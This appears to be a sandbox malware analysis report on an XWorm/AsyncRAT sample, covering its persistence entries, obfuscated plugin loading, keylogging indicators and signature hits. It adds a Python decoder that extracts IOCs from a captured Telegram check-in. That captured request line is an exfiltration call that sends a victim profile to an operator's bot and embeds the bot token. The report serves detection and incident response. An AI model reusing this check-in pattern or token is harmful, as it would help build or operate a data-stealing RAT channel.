Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2
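The Telegram check-in captured above carries everything a responder needs from this channel in one GET: the bot token and chat_id in the path and query identify the operator's bot and inbox, and the percent-encoded text parameter is the victim profile the client reports (a client ID, user name, OS, hardware summary and the build's "Groub" label). The following is an added example (not Joe Sandbox code) that decodes such a request line from a proxy log or PCAP into those fields; parse_checkin and split_profile are my own helpers, and REQUEST_LINE is reassembled from the request in the report as constructed sample input.

```python
"""Decoder for an XWorm Telegram Bot API check-in request line.

Added example, not Joe Sandbox code. parse_checkin() and split_profile() are
my own helpers. REQUEST_LINE is reassembled from the GET request shown in the
report (constructed sample input); only the request line is needed, the Host
header value is passed separately.
"""
import re
from urllib.parse import parse_qs, urlsplit

TELEGRAM_HOST = "api.telegram.org"
# Bot API paths look like /bot<numeric id>:<secret>/<method>
BOT_PATH = re.compile(r"^/bot(?P<token>(?P<bot_id>\d+):[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")

# Constructed from the report's HTTP request (the text parameter is still percent-encoded).
REQUEST_LINE = (
    "GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text="
    "%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0A"
    "UserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0A"
    "CPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1"
)


def split_profile(text: str):
    """Split the decoded message into its banner line and 'Key : Value' fields.

    A field whose value is empty takes the next non-empty line: the client ID is
    printed that way ("New Clinet : " followed by the ID on its own line).
    """
    lines = text.split("\r\n")
    banner = lines[0].strip() if lines else ""
    fields, pending = {}, None
    for line in lines[1:]:
        if " : " in line:
            key, value = (part.strip() for part in line.split(" : ", 1))
            if value:
                fields[key] = value
                pending = None
            else:
                pending = key
        elif line.strip() and pending:
            fields[pending] = line.strip()
            pending = None
    return banner, fields


def parse_checkin(request_line: str, host: str = TELEGRAM_HOST):
    """Return a dict of IOCs for a Telegram Bot API request line, or None if it is not one."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None
    if host.lower() != TELEGRAM_HOST:
        return None
    parts = urlsplit(target)
    match = BOT_PATH.match(parts.path)
    if match is None:
        return None
    query = parse_qs(parts.query)            # percent-decodes the text parameter
    banner, fields = split_profile(query.get("text", [""])[0])
    version = re.search(r"\[(.+?)\]", banner)  # "[XWorm V5.6]" in the first line
    return {
        "api_method": match.group("method"),
        "bot_id": match.group("bot_id"),
        "bot_token": match.group("token"),
        "chat_id": query.get("chat_id", [""])[0],
        "banner": banner,
        "family": version.group(1) if version else None,
        "victim": fields,
    }


if __name__ == "__main__":
    result = parse_checkin(REQUEST_LINE)
    for key, value in result.items():
        print(f"{key}: {value}")
```

The bot token and chat_id are the operator's, not the victim's, so they are the pivot values to search for across other proxy logs; the client ID (95B5CEC98776D486C10E here) identifies the infected host to the operator. Requests to api.telegram.org from a process that is not a chat client are worth alerting on regardless of whether the path parses, and this decoder only adds the field extraction on top of that.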

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: yF21ypxRB7.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: svchost.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout

                    System Summary

                    Source: yF21ypxRB7.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B79C20_2_00007FFAAC5B79C2
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B0ED90_2_00007FFAAC5B0ED9
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B6C160_2_00007FFAAC5B6C16
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeCode function: 0_2_00007FFAAC5B4FDD0_2_00007FFAAC5B4FDD
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFAAC570ED98_2_00007FFAAC570ED9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFAAC580ED910_2_00007FFAAC580ED9
                    Source: yF21ypxRB7.exe, 00000000.00000000.1245680814.000000000047C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVmxCheats.exe4 vs yF21ypxRB7.exe
                    Source: yF21ypxRB7.exeBinary or memory string: OriginalFilenameVmxCheats.exe4 vs yF21ypxRB7.exe
                    Source: yF21ypxRB7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: yF21ypxRB7.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: yF21ypxRB7.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: yF21ypxRB7.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: yF21ypxRB7.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: yF21ypxRB7.exe, Settings.cs | Base64 encoded string: 'Y3TBMzct0fB6CK9FPYM4ZIecyWQY3Lk9OU5z/LNFURJvaUTnYE30d0gTYCE4UAl8'
                    Source: svchost.exe.0.dr, Settings.cs | Base64 encoded string: 'Y3TBMzct0fB6CK9FPYM4ZIecyWQY3Lk9OU5z/LNFURJvaUTnYE30d0gTYCE4UAl8'
                    Source: yF21ypxRB7.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: yF21ypxRB7.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: svchost.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: svchost.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/5@3/2
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Mutant created: \Sessions\1\BaseNamedObjects\vnCrrKpdlb0ooKNR
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
                    Source: yF21ypxRB7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: yF21ypxRB7.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: yF21ypxRB7.exe | ReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | File read: C:\Users\user\Desktop\yF21ypxRB7.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\yF21ypxRB7.exe "C:\Users\user\Desktop\yF21ypxRB7.exe"
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: sxs.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: scrrun.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: linkinfo.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: ntshrui.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: cscapi.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: avicap32.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: msvfw32.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Section loaded: winmm.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: w32time.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: logoncli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: vmictimeprovider.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: mpclient.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: secur32.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: version.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: msasn1.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: userenv.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: gpapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: amsi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: profapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: wscapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: urlmon.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: iertutil.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: srvcli.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: netutils.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: slc.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
                    Source: svchost.lnk.0.dr | LNK file: ..\..\..\..\..\svchost.exe
                    Source: yF21ypxRB7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: yF21ypxRB7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: yF21ypxRB7.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: yF21ypxRB7.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: svchost.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: svchost.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: yF21ypxRB7.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: yF21ypxRB7.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                    Source: yF21ypxRB7.exe, Messages.cs | .Net Code: Memory
                    Source: svchost.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: svchost.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                    Source: svchost.exe.0.dr, Messages.cs | .Net Code: Memory
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Code function: 0_2_00007FFAAC5B32A7 pushad ; ret 0_2_00007FFAAC5B32C1
                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFAAC5700BD pushad ; iretd 8_2_00007FFAAC5700C1

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                    Source: C:\Windows\System32\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
